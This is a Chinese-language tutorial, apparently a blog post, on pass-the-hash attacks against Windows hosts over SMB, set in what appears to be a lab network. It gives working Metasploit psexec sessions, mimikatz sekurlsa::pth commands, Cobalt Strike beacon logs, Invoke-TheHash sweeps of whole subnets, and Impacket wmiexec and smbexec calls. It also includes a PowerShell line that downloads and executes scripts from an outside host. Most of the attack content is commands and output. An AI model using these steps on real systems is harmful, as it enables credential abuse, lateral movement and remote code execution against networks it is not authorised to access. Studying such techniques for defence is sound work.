PTH简介 PASS THE Hash 也叫 Hash 传递攻击,简称 PTH。模拟用户登录不需要用户明文密码,就可以直接用获取到的 Hash 来登录目标系统。
利用成功的前提条件是:
开启 445 端口 SMB 服务
开启 admin$ 共享
获取Hash 通过获取的Meterpreter会话执行hashdump得到用户hash值
1 2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
执行直接就获取到meterpreter的PTH模块:exploit/windows/smb/psexec
工作组
1 2 3 sessions 1 run autoroute -s 10.10.10.1/24 run autoroute -p
内网环境采用正向shell的payload,得到内网目标主机的shell会话
1 2 3 4 5 6 7 msf6 > use exploit/windows/smb/psexec msf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.20 msf6 exploit(windows/smb/psexec) > set smbuser administrator msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp msf6 exploit(windows/smb/psexec) > set lport 51234 msf6 exploit(windows/smb/psexec) > run
域环境
1 e318a05a844086852b42d47e60ee2b1c
1 2 3 4 5 6 msf5 > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > set rhosts 10.10.10.10 msf5 exploit(windows/smb/psexec) > set smbdomain kc.local msf5 exploit(windows/smb/psexec) > set smbuser lisi msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e318a05a844086852b42d47e60ee2b1c msf5 exploit(windows/smb/psexec) > run
Mimikatz Hash传递攻击 当我们获得了内网中一台主机的NTLM哈希值,我们可以利用mimikatz对这个主机进行哈希传递攻击,执行命令成功后将会反弹回cmd
1 mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:10.10.10.20 /ntlm:45a524862326cb9e7d85af4017a000f0" exit
在弹出的cmd中,我们还可以直接连接该主机,还可以查看目录文件等操作
1 2 3 4 net use \\10.10.10.20\c$ dir \\10.10.10.20\c$ copy 1.exe \\10.10.10.20\c$ net use h: \\10.10.10.20\c$
CobaltStrike Hash传递攻击 获取Hash 得到Beacon会话后,执行hashdump、logonpasswords 等命令即可得到当前主机用户Hash
工作组 以上操作实际是在指定Beacon会话中执行如下命令:
1 2 3 4 5 6 7 8 9 10 rev2self #还原token令牌 pth PC\Administrator 45a524862326cb9e7d85af4017a000f0 #使用mimikatz执行PTH操作 #mimikatz's sekurlsa::pth /user:Administrator /domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960" jump psexec WEB 42585 #生成 windows/beacon_bind_tcp (0.0.0.0:42585) 对应的 payload (\\WEB\ADMIN$\403121c.exe),并上传到WEB主机 #在WEB主机通过 Service Control Manager 创建并启动服务 403121c 运行 payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [01/30 01:38:21] beacon> rev2self [01/30 01:38:21] [*] Tasked beacon to revert token [01/30 01:38:21] beacon> pth PC\Administrator 45a524862326cb9e7d85af4017a000f0 [01/30 01:38:21] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator / domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960" command [01/30 01:38:21] beacon> jump psexec WEB 42585 [01/30 01:38:21] [*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:42585) on WEB via Service Control Manager (\\WEB\ADMIN$\403121c.exe) [01/30 01:38:23] [+] host called home, sent: 591778 bytes [01/30 01:38:28] [+] Impersonated PC\Administrator [01/30 01:38:28] [+] received output: Started service 403121c on WEB [01/30 01:38:28] [+] established link to child beacon: 10.10.10.20 [01/30 01:38:28] [+] receiv+ed output: user : Administrator domain : PC program : C:\Windows\system32\cmd.exe /c echo 55d23cd5b3e > \\.\pipe\2f6960 impers. : no NTLM : 45a524862326cb9e7d85af4017a000f0 | PID 1824 | TID 4024 | LSA Process is now R/W | LUID 0 ; 55498536 (00000000:034ed728) \_ msv1_0 - data copy @ 00000000018EFED0 : OK ! \_ kerberos -
域环境
得到kc域内lisi用户ntlm hash ,发现是域管理员用户:
通过执行net view
定位 DC 的IP地址:10.10.10.10
Powershell Hash传递攻击 使用已知管理员Hash,批量撞指定网段机器,此方式同时适用于工作组和域环境。
需要同时加载Invoke-WMIExec.ps1
、Invoke-TheHash.ps1
https://github.com/Kevin-Robertson/Invoke-TheHash
1 2 3 4 powershell -exec bypass Import-Module .\Invoke-WMIExec.ps1 Import-Module .\Invoke-TheHash.ps1
1 2 3 4 powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-WMIExec.ps1'); IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-TheHash.ps1');
1 Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash 579110c49145015c47ecd267657d3174
1 2 3 4 5 工作组: PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4 域: PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 10.10.10.0/24 -Domain kc -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10
Impacket Hash传递攻击 1 2 3 4 5 命令执行: wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20 "whoami" 得到shell: smbexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20